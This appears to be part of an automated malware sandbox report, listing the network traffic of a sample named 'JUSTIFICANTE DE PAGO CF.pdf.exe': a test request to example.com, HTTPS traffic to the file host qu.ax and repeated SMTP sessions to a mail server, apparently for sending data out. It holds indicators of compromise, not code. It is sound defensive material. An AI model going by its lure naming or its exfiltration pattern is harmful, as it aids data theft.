                                                                              Feb 21, 2024 21:09:31.471571922 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.474982023 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475028992 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475066900 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.475076914 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475104094 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.475126028 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.475682974 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475732088 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475768089 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.475778103 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.475804090 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.475828886 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.522887945 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.522916079 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.523032904 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.523045063 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.523083925 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.526487112 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.526500940 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.526568890 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.526572943 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.526602983 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.530559063 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.530572891 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.530649900 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.530653000 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.530842066 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.537564039 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.537579060 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.537636995 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.537641048 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.537894964 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.549025059 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.549040079 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.549122095 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.549135923 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.549262047 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.555615902 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.555632114 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.555696964 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.555701971 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.555896044 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.558502913 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.558516979 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.558583021 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.558592081 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.558698893 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.560404062 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.560419083 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.560473919 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.560477972 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.560504913 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.560518026 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.562833071 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.562845945 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.562922001 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.562933922 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.564140081 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.577090025 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.577116966 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.577187061 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.577198029 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.577325106 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.583266020 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.583287001 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.583340883 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.583353043 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.583506107 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.595581055 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.595599890 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.595660925 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.595673084 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.595729113 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.597040892 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.597058058 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.597110033 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.597120047 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.599309921 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.630666971 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.630721092 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.630781889 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.630848885 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.630891085 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.631609917 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.633373976 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.633423090 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.633466005 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.633501053 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.633539915 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.633618116 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.635442019 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.635500908 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.635545969 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.635557890 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.635586977 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.635607958 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.641545057 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.641596079 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.641645908 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.641668081 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.641691923 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.641803026 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.642517090 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.642569065 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.642606974 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.642617941 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.642647028 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.642664909 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643366098 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643407106 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643445969 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643455982 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643481970 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643503904 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643553972 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643640041 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643651009 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643733025 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.644831896 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.646042109 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.697247982 CET4973280192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.698376894 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.784710884 CET804973293.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.784806967 CET4973280192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.785666943 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.785856962 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.785970926 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.873548985 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.873991966 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.874003887 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.874212027 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:32.321244955 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:33.229746103 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.426254034 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.426326036 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.629554987 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.629923105 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.826782942 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.829037905 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.027642012 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.032692909 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.243825912 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243863106 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243874073 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243887901 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243947029 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.243947983 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.245425940 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.247076035 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.443599939 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.463968039 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.660788059 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.661195040 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.858198881 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.858665943 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.066811085 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.067312002 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.263463974 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.264244080 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.469202042 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.469439983 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.665977955 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.666790962 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666868925 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666908979 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666944027 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.862826109 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862847090 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862903118 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862914085 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.886693954 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.926717997 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.162916899 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.535911083 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.541100979 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.543262005 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.739094973 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.739202023 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.145499945 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.145700932 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.342232943 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.387487888 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.418860912 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.616910934 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.617353916 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.825069904 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825145960 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825177908 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825227022 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825253010 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.825290918 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.826997042 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.837656021 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:38.034272909 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:38.090496063 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:38.957914114 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.154699087 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.156677008 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.353605032 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.353948116 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.561652899 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.561888933 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.758111000 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.758390903 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.980176926 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.980426073 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.176748037 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.177350998 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177503109 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177558899 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177611113 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177675962 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177716970 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177757978 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177804947 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177839041 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177876949 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.373473883 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.373493910 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.373507023 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374356985 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374408960 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374420881 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374430895 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374442101 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374540091 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374552011 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.413280964 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.465617895 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.072593927 CET49709587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.372061014 CET49709587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.609987974 CET58749709191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:10:32.984625101 CET58749709191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:10:32.985430002 CET49709587192.168.2.5191.252.141.106

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2024 21:08:47.990926981 CET6344353192.168.2.51.1.1.1
                                                                              Feb 21, 2024 21:08:48.079638004 CET53634431.1.1.1192.168.2.5
                                                                              Feb 21, 2024 21:08:48.468378067 CET5675753192.168.2.51.1.1.1
                                                                              Feb 21, 2024 21:08:48.646100044 CET53567571.1.1.1192.168.2.5
                                                                              Feb 21, 2024 21:08:51.865258932 CET6244553192.168.2.51.1.1.1
                                                                              Feb 21, 2024 21:08:52.755491018 CET53624451.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Feb 21, 2024 21:08:47.990926981 CET192.168.2.51.1.1.10x49bbStandard query (0)www.example.comA (IP address)IN (0x0001)false
                                                                              Feb 21, 2024 21:08:48.468378067 CET192.168.2.51.1.1.10xf919Standard query (0)qu.axA (IP address)IN (0x0001)false
                                                                              Feb 21, 2024 21:08:51.865258932 CET192.168.2.51.1.1.10x677cStandard query (0)mail.wassadadvogados.com.brA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Feb 21, 2024 21:08:48.079638004 CET1.1.1.1192.168.2.50x49bbNo error (0)www.example.com93.184.216.34A (IP address)IN (0x0001)false
                                                                              Feb 21, 2024 21:08:48.646100044 CET1.1.1.1192.168.2.50xf919No error (0)qu.ax45.83.31.187A (IP address)IN (0x0001)false
                                                                              Feb 21, 2024 21:08:52.755491018 CET1.1.1.1192.168.2.50x677cNo error (0)mail.wassadadvogados.com.brwassadadvogados.com.brCNAME (Canonical name)IN (0x0001)false
                                                                              Feb 21, 2024 21:08:52.755491018 CET1.1.1.1192.168.2.50x677cNo error (0)wassadadvogados.com.br191.252.141.106A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • qu.ax
                                                                              • www.example.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54970593.184.216.34802360C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:08:48.185903072 CET172OUTPOST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:08:48.273284912 CET25INHTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:08:48.273722887 CET25OUTData Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:08:48.425983906 CET652INHTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:08:48 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:08:48 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.54970793.184.216.34802360C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2024 21:08:50.142678022 CET56OUTGET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:08:50.230633974 CET1286INHTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366073
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:08:50 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:08:50 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 